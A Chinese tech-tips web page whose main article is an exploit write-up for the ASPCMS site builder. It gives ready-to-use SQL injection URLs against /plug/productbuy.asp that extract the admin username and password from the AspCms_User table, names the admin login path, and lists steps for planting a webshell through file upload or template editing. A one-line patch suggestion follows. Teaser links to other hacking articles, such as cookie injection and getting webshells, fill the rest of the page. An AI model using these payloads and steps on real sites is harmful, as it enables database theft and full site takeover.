0day漏洞出现在aspcms企业建站系统上?0day漏洞怎么修复?
aspcms企业建站系统0day 2.0以上通杀2011-08-14 19:21aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........
爆密码
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后台登录地址:/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板,内容写马的内容.
修复方法: id用cint(request("id"))
windows的文件夹怎么加密?文件加密的方法
个人信息安全,尤其是公共电脑,隐私保护就很重要了。如何让你文件夹看起来更个性,信息更安全?使用更方便呢?在本文中编辑将给大家介绍这方面的技巧,一定会让你的系统看起来更加有个性,使用更方便,信息更安
详情2018-01-05 14:12:43责编:llp 来源:驱动管家
web服务器的漏洞 web服务器的保护
Web安全分为两大类:· Web服务器的安全性(Web服务器本身安全和软件配置)。· Web应用程序的安全性(在Web服务器上运行的Java、 ActiveX、PHP、ASP代码的安全)。Web服务器面临的攻击Web服务器攻击利用Web服务器
详情2018-01-08 19:52:37责编:llp 来源:驱动管家
什么是csrf攻击?csrf攻击如何防御?
0x01 什么是CSRF攻击CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。网站是通过cookie来识别用
详情2018-01-16 19:41:43责编:llp 来源:驱动管家
网站漏洞扫描工具:awvs怎么进行网站漏洞扫描
使用AWVS对域名进行全局分析,深入探索:首先,介绍一下AWVS这个工具。 Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。
详情2018-01-09 10:33:24责编:llp 来源:驱动管家
rar.exe有什么用?上传rar.exe可以快速下载su目录文件
你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了rar exe一切变的简单了!好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar exe,虽然program files目录有,但是
详情2018-01-12 13:31:18责编:llp 来源:驱动管家
dns欺骗是什么?dns欺骗有什么条件和限制?
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“
详情2018-01-02 16:11:39责编:llp 来源:驱动管家
cookies是什么?怎么采用cookies注入的方法入侵网站?
现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式都没有防备。Cookies是一种能够让网站
详情2018-01-19 17:54:39责编:llp 来源:驱动管家
防病毒技术 电脑怎么设置才能防止病毒捆绑常用程序?
1、百毒不侵,权限这样设我们知道病毒等恶意程序经常把自己隐藏在windows(反健设置权限)系统目录中,如果对他的权限进行下设置,能够防止绝大部分的病毒。首先,确定你的系统目录没有任何病毒;右键单击c:windows
详情2018-01-20 18:00:24责编:llp 来源:驱动管家
怎么获取webshell?得到webshell获取网站控制权的十大方法
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取websh
详情2018-01-17 15:24:21责编:llp 来源:驱动管家
asp.net是什么?asp.net的几种加密方法?
ASP NET不是一种语言,而是创建动态Web页的一种服务器端技术,开发web应用。可以使用多种语言,最大的特点就是“一切皆控件”,提供了很多服务器端控件,是编译执行的,执行效率比asp高。Asp net加密方法有几种,
详情2018-01-19 13:32:44责编:llp 来源:驱动管家
- 什么是电脑肉鸡?电脑沦为肉鸡有哪些表现?
- 百度糯米团购可以退款吗?百度糯米团购在哪儿退款?
- 有什么微信小程序可以订酒店?微信有哪些订酒店的小程序?
- 怎么把笔记本变成wifi热点?这个方法最好用
- 新电池充电时间要多长?新电池怎么保养
- 一个方法教你轻松制作和刻录iso文件
- cfg是什么文件?cfg文件怎么打开
- iphone5主题更换怎么做?更换iphone5主题的方法
- 港版iphone5s的型号是什么?港版iphone5s与国内版配置一样吗?
- Foxmail邮箱设置出问题了吗?为什么Foxmail无法登录163邮箱?
- qq邮箱怎么设置自动回复?qq邮箱自动回复怎么设置?
- 管家婆软件的漏洞分析:该漏洞很容易被入侵
- 什么是加密?加密与数字签名有何区别?
- 怎么把酷狗上的歌单分享给好友?酷狗音乐分享歌单方法
- 微信小程序开发工具在哪儿下载?微信小程序开发工具怎么下载?
- 联想一键还原的功能用不了怎么解决
- ipad电脑充电的时候发现充不进去有什么办法解决
- win7文件属性可以批量更改吗?win7文件属性更改的方法
- 笔记本电脑拔掉电脑电源后为什么屏幕会变暗
- 有哪些手机防水?手机防水大测评
